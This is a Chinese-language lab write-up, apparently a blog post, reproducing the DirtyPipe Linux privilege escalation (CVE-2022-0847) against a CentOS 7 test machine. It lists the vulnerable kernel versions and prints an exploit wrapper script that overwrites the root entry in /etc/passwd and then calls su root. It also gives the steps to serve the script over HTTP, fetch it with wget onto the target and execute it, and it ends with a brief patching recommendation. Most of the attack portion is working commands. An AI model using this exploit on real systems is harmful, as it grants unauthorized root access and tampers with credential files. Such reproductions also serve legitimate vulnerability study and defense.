Linux脏管道提权

Linux脏管道提权

漏洞复现-DirtyPipe提权(CVE-2022-0847)

0x00 前言

此漏洞自 5.8 版本起就已存在。非 root 用户通过注入和覆盖只读文件中的数据,从而获得 root 权限。因为非特权进程可以将代码注入 root 进程。

漏洞利用条件:

1、内核影响版本:5.8 <= Linux kernel < 5.16.11/5.15.25/5.10.102

2、被覆写的目标文件必须拥有可读权限。

uname -a查看内核版本

攻击者靶机
操作系统kaliCentOS 7
IP地址192.168.12.135192.168.12.131
内核5.8.7

这里使用普通用户登录靶机,进行提权,前期入侵操作默认完成

0x01 下载poc代码

https://github.com/r1is/CVE-2022-0847/blob/main/Dirty-Pipe.sh

查看文件,原理

gcc exp.c -o exp -std=c99

# 备份密码文件
rm -f /tmp/passwd
cp /etc/passwd /tmp/passwd
if [ -f "/tmp/passwd" ];then
	echo "/etc/passwd已备份到/tmp/passwd"
	passwd_tmp=$(cat /etc/passwd|head)
	./exp /etc/passwd 1 "${passwd_tmp/root:x/oot:}"

	echo -e "\n# 恢复原来的密码\nrm -rf /etc/passwd\nmv /tmp/passwd /etc/passwd"

	# 现在可以无需密码切换到root账号
	su root

将文件存入/tmp目录下,开启web服务

cd /tmp

python -m http.server 8080

0x02 在靶机运行poc代码

# 下载poc到靶机,如果连的上github,就不用自己部署云上
wget http://192.168.12.135:8080/Dirty-Pipe.sh

# 添加权限
chmod a+x Dirty-Pipe.sh

# 运行代码
./Dirty-Pipe.sh

# 查看
id
whoami
# 是root就成功

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2C9S6l61-1677339539554)(Linux-脏管道提权.assets/image-20230225181744462.png)]

0x03 修复建议

更新系统内核为已修复该漏洞的版本。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值